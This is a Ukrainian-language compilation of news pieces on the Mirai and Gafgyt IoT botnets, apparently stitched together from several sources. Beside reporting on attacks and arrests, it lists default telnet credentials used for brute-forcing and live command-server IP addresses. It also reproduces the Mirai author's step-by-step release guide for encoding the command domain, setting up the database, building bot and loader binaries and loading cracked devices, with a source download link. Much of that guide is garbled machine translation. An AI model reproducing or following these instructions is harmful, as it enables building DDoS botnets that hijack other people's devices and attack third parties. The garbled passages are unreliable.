Два найвідоміші і поширені IoT-ботнети - Mirai і Gafgyt - продовжують «розмножуватися». Було виявлено нові варіанти цих шкідливих даних, націлені на корпоративний сектор. Основна небезпека цих кіберзагрозу полягає в добре організованих і досить потужних DDoS-атаках.
Причина такої поширеності цих двох зловредів криється в злитому вихідному коді, який став доступним громадськості кілька років тому. Початківці кіберзлочинці відразу ж почали винаходити свої зловмисні програми на його основі.
У більшості випадків, зважаючи на некомпетентність зловмисників, клони Mirai і Gafgyt не являли собою якихось серйозних проектів і не несли істотних змін у своїх можливостях.
Однак останні варіанти ботнетів продемонстрували тенденцію зараження корпоративних пристроїв. У звіті Unit 42 команди Palo Alto Networks говориться, що нові зразки Mirai і Gafgyt додали в свій арсенал ряд нових експлойтів, які використовують старі вразливості.
Mirai тепер атакує системи, на яких запущений непропатчений Apache Struts (саме так минулого року зламали). Патч для пролому CVE-2017-5638 існує вже більше року, але, природно, не всі оновили свої установки.
Всього у Mirai на Наразі 16 експлойтів, більшість із яких призначені для компрометації пристроїв на кшталт маршрутизаторів, мережевих відеореєстраторів та різних камер.
Gafgyt (також відомий як Baslite) також атакує бізнес-обладнання, орієнтуючись на нещодавно виявлену вразливість CVE-2018-9866. Цей критичний недолік безпеки стосується непідтримуваних версій системи Global Management System (GMS) від SonicWall . Дослідники Unit 42 зафіксували нові зразки 5 серпня, тобто через тиждень після публікації модуля Metasploit для цієї вразливості.
Уражені Gafgyt пристрої можуть сканувати інше обладнання на наявність різноманітних проблем безпеки, а також атакувати їх відомими експлойтами. Ще один вид атаки, який може здійснювати даний шкідливість - Blacknurse, є ICMP-атакою, яка сильно впливає на завантаження ЦП, що призводить до відмови в обслуговуванні.
Експерти також виявили, що ці два нові варіанти ботнетів було розміщено на одному домені. Це доводить, що за ними стоїть той самий кіберзлочинець або їхня група.
У кінець минулого місяця ми повідомляли, що . Такі дані наводяться у звіті Global Threat Index за липень 2018 року.
А вже цього місяця правоохоронці розкрили особу, яка стоїть за одним із найвідоміших приймачів Mirai – Satori. Виявилося, що кіберзлочинцю в даний час пред'явлені звинувачення.
Атаки ботнета Mirai на американського DNS-провайдера Dyn у 2016 році викликали широкий резонанс та привернули підвищену увагу до ботнетів. Проте, в порівнянні з тим, як сучасні кіберзлочинці використовують ботнети сьогодні, атаки на компанію Dyn можуть здатися дитячими витівками. Злочинці швидко навчилися використовувати ботнети для запуску складних шкідливих програм, що дозволяють створювати цілі інфраструктури із заражених комп'ютерів та інших пристроїв із виходом до Інтернету для отримання незаконного прибутку у величезних масштабах.
В останні роки правоохоронні органи досягли певних успіхів у боротьбі зі злочинною діяльністю, пов'язаною з використанням ботнетів, але поки що цих зусиль, звичайно ж, недостатньо, щоб пробити достатній пролом у ботнетах під керівництвом кіберзлочинців. Ось кілька відомих прикладів:
- Міністерство юстиції США звинуватило двох молодих людей за їхню роль у розробці та використанні ботнету Mirai: 21-річному Парасу Джа (Paras Jha) та 20-річному Джошуа Вайту (Josiah White). Їх звинувачують в організації та проведенні DDoS-атак на компанії, а потім вимаганні викупу за їх припинення, а також з продажу цим компаніям «послуг» щодо запобігання подібним атакам у майбутньому.
- Іспанська влада в рамках транскордонної операції на запит США заарештувала жителя Санкт-Петербурга Петра Левашова, відомого в кіберзлочинних колах як Peter Severa. Він керував Kelihos, одним з ботнетів, що довго існували в Інтернеті, який, як оцінюється, заразив близько 100 тис. комп'ютерів. Крім здирництва, Петро Левашов активно використовував Kelihos для організації спам-розсилок, беручи по $200-$500 за мільйон повідомлень.
- Торік двох ізраїльських тінейджерів було заарештовано за звинуваченням в організації DDoS-атак за винагороду. Пара встигла заробити близько $600 тис. і провести близько 150 тис. DDoS-атак.
Ботнети є комп'ютерні мережі, що складаються з великої кількості підключених до Інтернету комп'ютерів або інших пристроїв, на яких без відома їхніх власників завантажено та запущено автономне програмне забезпечення - боти. Цікаво, що спочатку самі роботи були розроблені як програмні інструменти для автоматизації некримінальних одноманітних і повторюваних завдань. За іронією долі, один із перших успішних ботів, відомий як Eggdrop, і створений у 1993 році, був розроблений для управління та захисту каналів IRC (Internet Relay Chat) від спроб сторонніх осіб захопити керування ними. Але кримінальні елементи швидко навчилися використовувати потужність ботнетів, застосовуючи їх як глобальні, практично автоматичні системи, які дають прибуток.
За цей час шкідливе програмне забезпечення ботнетів значно розвинулося і зараз може використовувати різні методиатак, які відбуваються одночасно в кількох напрямах. Крім того, "ботекономіка", з погляду кіберзлочинців, виглядає надзвичайно привабливо. Насамперед практично відсутні витрати на інфраструктуру, оскільки для організації мережі із заражених машин використовуються скомпрометовані комп'ютери та інше обладнання з підтримкою виходу в Інтернет, природно, без відома власників цих пристроїв. Ця свобода від вкладень в інфраструктуру означає, що прибуток злочинців фактично дорівнює їх доходу від незаконної діяльності. Крім можливості використовувати таку «вигідну» інфраструктуру, для кіберзлочинців також надзвичайно важлива анонімність. Для цього при вимогі викупу вони, в основному, використовують такі криптовалюти, що не відслідковуються, як Bitcoin. З цих причин ботнети стали найбільш відданою платформою для кіберкриміналу.
З точки зору реалізації різних бізнес-моделей, ботнети є чудовою платформою для запуску різної шкідливої функціональності, яка дає кіберзлочинцям незаконний дохід.
- Швидке та масштабне поширення електронних листів, що містять програми-здирники, що вимагають викуп.
- Як платформа для накручування числа кліків за посиланням.
- Відкриття проксі-серверів для анонімного доступув інтернет.
- Здійснення спроб злому інших інтернет-систем методом повного перебору (або «грубою сили»).
- Проведення масових розсилокелектронних листів та здійснення хостингу підроблених сайтів при великомасштабному фішингу.
- Видалення CD-ключів або інших ліцензійних даних на програмне забезпечення.
- Крадіжка персональної ідентифікаційної інформації.
- Отримання даних про кредитні картки та іншу інформацію про банківський рахунок, включаючи PIN-коди або «секретні» паролі.
- Встановлення клавіатурних шпигунів для захоплення всіх даних, які вводить користувач у систему.
Як створити ботнет?
Важливим фактором, що сприяє популярності використання ботнетів серед кіберзлочинців у наш час, є та відносна легкість, з якою можна зібрати, змінити та вдосконалити різні компоненти шкідливого програмного забезпеченняботнету. Можливість для швидкого створенняботнета з'явилася ще в 2015 році, коли в загальному доступі опинилися вихідні коди LizardStresser, інструментарію для проведення DDoS-атак, створеного відомою групою хакерів Lizard Squad. Завантажити ботнет для проведення DDOS атак сьогодні може будь-який школяр (що вони вже й роблять, як пишуть видання новин по всьому світу).
Легко доступний для скачування і простий у використанні код LizardStresser містить деякі складні методи для здійснення DDoS-атак: тримати відкритим TCP-з'єднання, посилати випадкові рядки зі змістом символів на TCP-порт або UDP-порт, або повторно відправляти TCP-пакети із заданими значень прапорів. Шкідлива програма також включала механізм для довільного запуску команд оболонки, що є надзвичайно корисним для завантаження оновлених версій LizardStresser з новими командами та оновленим списком контрольованих пристроїв, а також для встановлення зараженого пристрою іншого шкідливого програмного забезпечення. З того часу були опубліковані вихідні коди та інші шкідливим програмдля організації та контролю ботнетів, включаючи, в першу чергу, ПЗ Mirai, що драматично зменшило «високотехнологічний бар'єр» для початку кримінальної активності і, водночас, збільшило можливості для отримання прибутку та гнучкості застосування ботнетів.
Як інтернет речей (IoT) став клондайком для створення ботнетів
З точки зору кількості заражених пристроїв та генерованого ними під час атак трафіку, вибухоподібний ефект мало масове використання незахищених IoT-пристроїв, що призвело до появи безпрецедентних за своїми масштабами ботнетів. Так, наприклад, влітку 2016 року до та безпосередньо під час Олімпійських Ігор у Ріо-де-Жанейро один із ботнетів, створений на основі програмного коду LizardStresser, в основному використовував близько 10 тис. заражених IoT-пристроїв (насамперед веб-камери) для здійснення численних і тривалих у часі DDoS-атак зі стійкою потужністю понад 400 Гбіт/с, що досягла значення 540 Гбіт/с під час свого піку. Зазначимо, що, згідно з оцінками, оригінальний ботнет Mirai зміг скомпрометувати близько 500 тис. IoT-пристроїв по всьому світу.
Незважаючи на те, що після подібних атак багато виробників внесли деякі зміни, IoT-пристрої здебільшого все ще поставляються з встановленими заводськими налаштуваннями імені користувача та пароля або з відомими вразливістю в безпеці. Крім того, щоб заощадити час і гроші, частина виробників періодично дублюють апаратне та програмне забезпечення для різних класів пристроїв. Як результат: паролі за замовчуванням, які використовуються для керування вихідним пристроєм, можуть бути застосовані для безлічі інших пристроїв. Таким чином, мільярди незахищених IoT пристроїв вже розгорнуті. І, незважаючи на те, що прогнозоване зростання їхньої кількості сповільнилося (хоч і незначно), очікуване збільшення світового парку «потенційно небезпечних» IoT-пристроїв у найближчому майбутньому не може не шокувати (див. графік нижче).
Багато IoT-пристроїв чудово підходять для неправомірного використання у складі злочинних ботнетів, так як:
- Здебільшого вони некеровані, іншими словами працюють без належного контролю з боку системного адміністраторащо робить їх застосування як анонімних проксі надзвичайно ефективним.
- Зазвичай вони знаходяться онлайн 24x7, а значить вони доступні для здійснення атак у будь-який час, причому, як правило, без будь-яких обмежень по пропускної спроможностіабо фільтрації трафіку.
- Вони часто використовують урізану версію операційної системи, реалізовану на базі сімейства Linux. А шкідливе програмне забезпечення ботнетів може бути легко скомпільоване для широко використовуваних архітектур, переважно ARM/MIPS/x86.
- Урізана операційна системаавтоматично означає менше можливостей для реалізації функцій безпеки, включаючи формування звітності, тому більшість загроз залишаються непоміченими власниками цих пристроїв.
Ось ще один недавній приклад, який допоможе усвідомити ту міць, яку можуть мати сучасні кримінальні інфраструктури ботнету: у листопаді 2017 року ботнет Necurs здійснив розсилку нового штаму вірусу-шифрувальника Scarab. В результаті масової компанії було відправлено близько 12,5 млн. інфікованих електронних листів, тобто швидкість розсилки склала більш ніж 2 млн. листів на годину. До речі, цей же ботнет був помічений у поширенні банківських троянів Dridex та Trickbot, а також вірусів-здирників Locky та Jans.
Висновки
Складена в останні роки благодатна ситуація для кіберзлочинців, пов'язана з високою доступністю та простотою використання більш складного та гнучкого шкідливого програмного забезпечення для ботнетів у поєднанні зі значним приростом кількості незахищених IoT-пристроїв, зробило кримінальні ботнети основним компонентом зростаючої цифрової підпільної економіки. У цій економіці є ринки для збуту отриманих нелегальним шляхом даних, здійснення шкідливих дій проти конкретних цілей у межах надання послуг за наймом, і навіть для власної валюти. І всі прогнози аналітиків та фахівців з безпеки звучать вкрай невтішно — у найближчому майбутньому ситуація з неправомірним використанням ботнетів для отримання незаконного прибутку лише погіршиться.
Вічний параноїк, Антон Кочуков.
Див. також:
Минулого тижня в мережу вибігли вихідні складники ботнету Mirai - використаного при рекордних DDoS атакахпотужністю до 1 Tб/с.
ст. 273 КК РФ. Створення, використання та розповсюдження шкідливих комп'ютерних програм
1. Створення, розповсюдження чи використання комп'ютерних програм чи іншого комп'ютерної інформації, що свідомо призначені для несанкціонованого знищення, блокування, модифікації, копіювання комп'ютерної інформації або нейтралізації засобів захисту комп'ютерної інформації, —
караються обмеженням волі на строк до чотирьох років, або примусовими роботами на строк до чотирьох років, або позбавленням волі на той же термін зі штрафом у розмірі до двохсот тисяч рублів або у розмірі заробітної плати чи іншого доходу, засудженого за період до вісімнадцяти місяців.
2. Діяння, передбачені частиною першою цієї статті, вчинені групою осіб за попередньою змовою або організованою групою або особою з використанням свого службового становища, а також завдали великих збитків або вчинених із корисливої зацікавленості,
караються обмеженням волі на строк до чотирьох років, або примусовими роботами на строк до п'яти років з позбавленням права обіймати певні посади або займатися певною діяльністю на строк до трьох років або без, або позбавленням волі на строк до п'яти років зі штрафом у розмірі від ста тисяч до двохсот тисяч рублів або у розмірі заробітної плати або іншого доходу засудженого за період від двох до трьох років або без такого та з позбавленням права обіймати певні посади або займатися певною діяльністю на строк до трьох років або без такого.
3. Діяння, передбачені частинами першою або другою цієї статті, якщо вони спричинили тяжкі наслідки або створили загрозу їх настанню,
караються позбавленням волі терміном до семи років.
Цей ботнет складається в основному з камери, DVR пристроїв і т.д.
Зараження відбувається досить просто: інтернет сканується на відкриті 80/23 (web/telnet) порти та підбираються захардшкірені облікові записи.
Мало хто з користувачів змінює паролі вбудованих облікових записів (якщо це можливо), тому ботнет безперервно поповнюється новими пристроями. Якщо можна змінити пароль від веб-інтерфейсу перебуваючи в ньому, то пароль та й сама наявність telnet доступу від багатьох користувачів просто вислизає.
Найчастіше використовуються такі облікові записи:
enable:system
shell:sh
admin:admin
root:xc3511
root:vizxv
root:admin
root:xmhdipc
root:123456
root:888888
support:support
root:54321
root:juantech
root:anko
root:12345
admin:
root:default
admin:password
root:root
root:
user:user
admin:smcadmin
root:pass
admin:admin1234
root:1111
guest:12345
root:1234
root:password
root:666666
admin:1111
service:service
root:system
supervisor:supervisor
root:klv1234
administrator:1234
root:ikwb
root:Zte521
Після отримання доступу командний центр отримує бінарне повідомлення про наявність нового бота:
4a 9a d1 d1 = XXX.XXX.XXX.XXX (тут була адреса хоста)
05 = Tab
17 = 23 (Port 23 Telnet)
05 = Tab
61 64 6d 69 6e = username:admin admin
05 = Tab
61 64 6d 69 6e = user password: admin
Компоненти ботнета розраховані на роботу в різних середовищах, про що говорять виявлені семпли:
mirai.arm
mirai.arm7
mirai.mips
mirai.ppc
mirai.sh4
Командні сервери на даний момент зафіксовані на наступних адресах:
103.1.210.27
103.1.210.28
185.130.225.65
185.130.225.66
185.130.225.83
185.130.225.90
185.130.225.94
185.130.225.95
185.70.105.161
185.70.105.164
185.93.185.11
185.93.185.12
200.170.143.5
46.249.38.145
46.249.38.146
46.249.38.148
46.249.38.149
46.249.38.150
46.249.38.151
46.249.38.152
46.249.38.153
46.249.38.154
46.249.38.155
46.249.38.159
46.249.38.160
46.249.38.161
80.87.205.10
80.87.205.11
Інструкція зі створення ботнету досить проста, наводжу as is (джерело http://pastebin.com/E90i6yBB):
Greetz everybody,
When I first go in DDoS industry, I wasn’t planning on staying in it long. I made my money, there's lots of eyes looking в IOT now, so it's time to GTFO. However, I know every skid and their mama, it's their wet dream to have something besides qbot.
So today, I have an amazing release for you. With Mirai, I зазвичай пальці max 380k bots з telnet alone. However, після Kreb DDoS, ISPs been slowly shutting down and cleaning up their act. Сьогодні, max pull is about 300k bots, and dropping.
So, I am your senpai, і I will treat you real nice, my hf-chan.
І до всього, що вони були, щоб зробити будь-який, щоб зробити мою CNC, я мав гарні ласки, цей лад використовує домашній CNC. Це 60 seconds для всіх покупок, щоб reconnect, lol
Also, shoutout до цього blog post by malwaremustdie
http://blog.malwaremustdie.org/2016/08/mmd-0056-2016-linuxmirai-just.html
https://web.archive.org/web/20160930230210/http://blog.malwaremustdie.org/2016/08/mmd-0056-2016-linuxmirai-just.html<- backup in case low quality reverse engineer unixfreaxjp decides to edit his posts lol
Будьте багато речей для вас, тому що ви були хороші респондента, але ви дійсно just completely і повністю впевнені в перевірці цього binary. "Ми хотіли бути дуже приємними", я можу зробити мої приємні речі, ви робите багато містаків і згодом неспроможні деякі різновиди з мною. LOL
Let me give you some slaps back
1) port 48101 не є для з'єднання, він є для контролю для того, щоб запобігти множинним stances of bot running together
2) /dev/watchdog and /dev/misc не є для "відповіді", це для системи управління від hanging. Цей один є low-hanging fruit, so sad that you are extremely dumb
3) Ви помітили і думали FAKE_CNC_ADDR і FAKE_CNC_PORT був дійсним CNC, lol «Підставляти backdoor до з'єднання через HTTP на 65.222.202.53». you got tripped up by signal flow ;) try harder skiddo
4) Ваша skeleton інструменти розблокування ass, це означає, що атака decoder була «sinden style», але вона не може використовувати текст-базований протокол? CNC and bot communicate over binary protocol
5) ви можете 'chroot(«/») so predictable як torlus' but you don't understand, деякі інші kill based on cwd. Це показує, як ви можете вийти з реальним malware. Go back to skidland
Why are you writing reverse engineer tools? Ви не можете навіть правильно переглянути в першому місці. Please learn some skills перш ніж trying to impress others. Ваша агрегація в розголошенні того, що ви «не турбуєтеся» з вашим двором kung-fu statement зроблено мені приємно, якщо hard while eating my SO had to pat me on the back.
Just as I forever be free, you will be doomed до mediocracy forever.
Requirements
2 servers: 1 for CNC + mysql, 1 for scan receiver, and 1+ for loading
OP Requirements
2 VPS and 4 servers
- 1 VPS with extremely bulletproof host for database server
— 1 VPS, rootkitted, для scanReceiver and distributor
- 1 server for CNC (used like 2% CPU with 400k bots)
- 3x 10gbps NForce servers for loading (distributor distributes to 3 servers equally)
— Щоб встановити зв'язок з CNC, клацнути на домашній мові (resolv.c/resolv.h) і connect to that IP address
— Bots brute telnet using an advanced SYN scanner that is around 80x faster than the one in qbot, and uses almost 20x less resources. Коли йдеться про bruted результат, bot resolves інший domain and reports it. Це ведеться до окремого сервера до автоматичного завантаження напристроях як результати.
— Bruted results are sent by default on port 48101. The utility called scanListen.go в інструментах використовується як отримувати bruted results (I was getting around 500 bruted results per second at peak). Якщо ви збираєтеся в режимі debug, ви повинні бачити надійність зображенняListen binary appear in debug folder.
Mirai uses a spreading mechanism similar similar self-rep, але what I call «real-time-load». Основним чином, bots brute results, send it to server listening with scanListen utility, which sends the results to loader. Цей випадок (brute -> scanListen -> load -> brute) є відомий як реальний час loading.
Loader може бути налаштований для використання багаторазових IP-адрес для pass export port in Linux not enough variation in tuple to get more than 65k simultaneous outbound connections — in theory, this value lot less). I would have maybe 60k - 70k simultaneous outbound connections (simultaneous loading) spread out across 5 IPs.
Бот має several configuration options що є obfuscated в (table.c/table.h). У ./mirai/bot/table.h ви можете скористатися most descriptions for configuration options. However, в ./mirai/bot/table.c є кілька функцій, які ви *необхідні* для зміни get working.
— TABLE_CNC_DOMAIN — Domain name of CNC to connect to — DDoS avoidance дуже fun with mirai, люди намагаються зробити його CNC але я update it faster than they can find new IPs, lol. Retards:)
— TABLE_CNC_PORT — Port для підключення до неї, її набір до 23 already
— TABLE_SCAN_CB_DOMAIN — Якщо ми finding bruted results, цей домашній it is reported to
— TABLE_SCAN_CB_PORT — Дозволяє connect to for bruted results, it is set to 48101 already.
In ./mirai/tools you will find something called enc.c — Ви маєте compile this to output things to put in the table.c file
Run this inside mirai directory
./build.sh debug telnet
Ви будете мати деякі errors, що стосуються cross-compilers, які не будуть, якщо ви не можете їх configured. This is ok, won’t affect compiling the enc tool
Now, в ./mirai/debug folder you should see a compiled binary called enc. Для прикладу, щоб отримати скасовану скриньку для домашнє ім'я для об'єктів, щоб підключити, використовувати це:
./debug/enc string fuck.the.police.com
The output should look like this
XOR'ing 20 bytes of data…
x44x57x41x49x0cx56x4ax47x0cx
Це update the TABLE_CNC_DOMAIN значення для прикладу, заміна того, що довгий hex string з одним виконаним за enc tool. Also, you see "XOR'ing 20 bytes of data". Ця величина повинна отримувати останні argument tas well. So для example, the table.c line originally looks як це
add_entry (TABLE_CNC_DOMAIN, «x41x4Cx41x0Cx41x4Ax43x4Cx45x47x4Fx47x0Cx41x4Dx4Fx22», 30); //cnc.changeme.com
Now that we know value from enc tool, we update it like this
add_entry(TABLE_CNC_DOMAIN, "x44x57x41x49x0cx56x4ax47x0cx52x4dx4ex4bx41x47x0cx41x4dx4f22" // fuck.the.police.com
Деякі значення є strings, деякі є port (uint16 in network order / big endian).
CONFIGURE THE CNC:
apt-get install mysql-server mysql-client
CNC потребує database to work. Якщо ви встановили 데이터베이스, виконайте його і виконуйте наступні дії:
http://pastebin.com/86d0iL9g
Це буде створено database for you. Щоб отримати вашого користувача,
INSERT INTO users VALUES (NULL, 'anna-senpai', 'myawesomepassword', 0, 0, 0, 0, -1, 1, 30, »);
Now, go into file ./mirai/cnc/main.go
Edit these values
const DatabaseAddr string = "127.0.0.1"
const DatabaseUser string = "root"
const DatabasePass string = "password"
const DatabaseTable string = "mirai"
Для того, щоб отримати інформацію про MySQL Server, ви just installed
Cross compilers є easy, наступні інструкції на цьому link to set up. Ви повинні запустити вашу систему або перезавантажити файл .bashrc для цих змін до такого ефекту.
http://pastebin.com/1rRCc3aD
The CNC, bot, and related tools:
http://dopefile.pk/a9f2n9ewk8om
How to build bot + CNC
У mirai folder, there is build.sh script.
./build.sh debug telnet
Будуть відтворювати блискавки банери, що не буде нібито і не повідомити info про те, якщо він може підключитися до CNC, etc, статуя floods, etc. Compiles to ./mirai/debug folder
./build.sh release telnet
Будуть випускати production-ready брокерів з bot, що є дуже stripped, невеликий (за 60K), які повинні бути завантажені напристроях. Compiles all binaries у форматі: «mirai.$ARCH» to ./mirai/release folder
Loader reads telnet entries from STDIN в наступному форматі:
ip:port user:pass
Це розпізнає, якщо є wget або tftp, і tries до завантаження binary using that. Якщо не, це буде echoload a tiny binary (за 1kb), що буде задовольнити як wget.
./build.sh
Буде будувати loader, optimized, виробництво використання, не fuss. Якщо ви маєте файл у форматах, використовуваних для навантаження, ви можете зробити це
cat file.txt | ./loader
Remember to ulimit!
Just so it's clear, I'm not providing any kind of 1 on 1 help tutorials or shit, too much time. Всі підписи і всі, що включаються до набору робіт, які працюють в межах 1 години. I am willing to help if you have individual questions (how come CNC no connecting to database, I did this this this blah blah), but not questions like «My bot not connect, fix it»
У середині вересня 2016 року відомий журналіст Браян Кребс вкотре насолив хакерському андеграунду, після чого його сайт, чия пікова потужність досягала 620 Гбіт/с. Як повідомляв Кребс і представники компанії Akamai, яка протягом кількох років надавала журналісту захист та хостинг абсолютно безкоштовно, атака здійснювалася за допомогою пакетів GRE (Generic Routing Encapsulation), що дуже незвичайно. Також фахівці повідомили, що більшість сміттєвого трафіку генерували різні IoT-пристрої: роутери, IP-камери, DVR і таке інше.
Тепер Браян Кребс на те, що автор малварі, завдяки якій і було створено цей ботнет, опублікував вихідні коди свого трояна на порталі Hack Forums. Цей троян відомий під різними іменами (Bashlite, GayFgt, LizKebab, Torlus, Bash0day і Bashdoor), але найчастіше його називають Mirai.
Автор малварі ховається під псевдонімом Anna-Senpai. У повідомленні, опублікованому на Hack Forums, він узяв на себе відповідальність за атаки на сайт Брайана Кребса і повідомив, що все одно не планував займатися DDoS-атаками довго. Тепер, коли атаки на Кребса привернули до ботнету багато уваги, а кількість ботів почала знижуватися, Anna-senpai вирішив, що настав час зробити подарунок усім скрипт-кідді і опублікувати вихідні коди трояна, щоб у них з'явилася хоч якась альтернатива qbot.
Вихідники Mirai Браян Кребс пише, що Mirai – це оновлена версіявідомої DDoS-малварі Bashlite, яка заразила вже близько мільйона IoT-пристроїв, за даними Level3 Communications. Публікацію вихідників журналіст називає дуже розумним ходом із боку зловмисників.
«Зловмисники, які розробляють малвар, часто розкривають вихідні коди публічно, коли правоохоронні органи та співробітники компаній, які займаються безпекою, починають винюхувати надто близько до їхнього будинку. Публікація кодів в онлайні, де будь-хто може побачити їх і завантажити, гарантує, що автор – не єдиний, хто володіє вихідними джерелами, на той випадок, якщо до нього прийдуть представники влади з ордером», - пише Кребс.
Схоже, що незабаром кількість заражених IoT-пристроїв зросте на порядок, а користувачі почнуть скаржитися на зниження швидкості роботи інтернету, оскільки IoT-девайси заб'ють весь канал своєю діяльністю, - пророкує Кребс. З ним згодні і фахівці MalwareTech, які похмуро жартують про соціалізм в галузі ботнетів.
Nice thing про Miria code before public is it mean less devices for any single person to control...kinda like socialism for botnets.
- MalwareTech (@MalwareTechBlog)
Про небезпеку доступних з Інтернету вбудованих пристроїв нам не дають забути потужні DDoS-атаки. Один із таких кіберинцидентів стався , коли на сайт відомого блогерата ІБ-дослідника Брайана Кребса обрушився сміттєвий потік, що на піку досяг 620 Гбіт/с.
Наприкінці минулого тижня проблема, пов'язана з наявністю величезної армії відкритих пристроїв, посилилася: вихідний код зловреду Mirai, що генерував цей потужний трафік, був опублікований на сайті Hackforums.
«Новина – не саме явище, а усвідомлення атакуючими наявності в Мережі величезної армії пристроїв з огріхами у конфігурації, такими як дефолтні ідентифікатори, якими легко скористатися, – каже Роланд Доббінс (Roland Dobbins), провідний інженер Arbor Networks. - Насправді, якщо говорити про пропускну здатність, вони більш ефективні, ніж комп'ютери загального призначення, тому що вони не обтяжені інтерфейсом користувачаі зазвичай не дуже навантажені».
Крім цього смарт-пристрої постійно увімкнені, а мережеві адміністратори, За словами Доббінса, рідко реагують на надмірну активність, яка виходить з таких пристроїв. «Вони зазвичай працюють безконтрольно і розгорнуті в мережах, оператори яких не звертають уваги на вхідний та вихідний трафік, - нарікає експерт. - До того ж таких пристроїв безліч. Зловмисники чудово знають, що з них можна скласти ботнет для проведення потужних атак».
Mirai особливо небезпечний тим, що він постійно сканує Інтернет у пошуках дефолтних та вшитих ідентифікаторів. Найкращий захист від таких зловредів – зміна облікових даних, оскільки простий перезапуск може призвести до повторного інфікування, як слушно зазначив Кребс.
«Атаки такого типу вже прийшли на зміну [традиційним DDoS], – констатує Доббінс. - IoT-ботнети - аж ніяк не майбутня загроза. Мене непокоїть не майбутнє, а минуле. Якби в мене була чарівна паличка, я зробив би так, щоб усіх цих ненадійних пристроїв не було. А поки ми, як і раніше, маємо велику проблему, в Інтернеті все ще присутні десятки мільйонів таких пристроїв».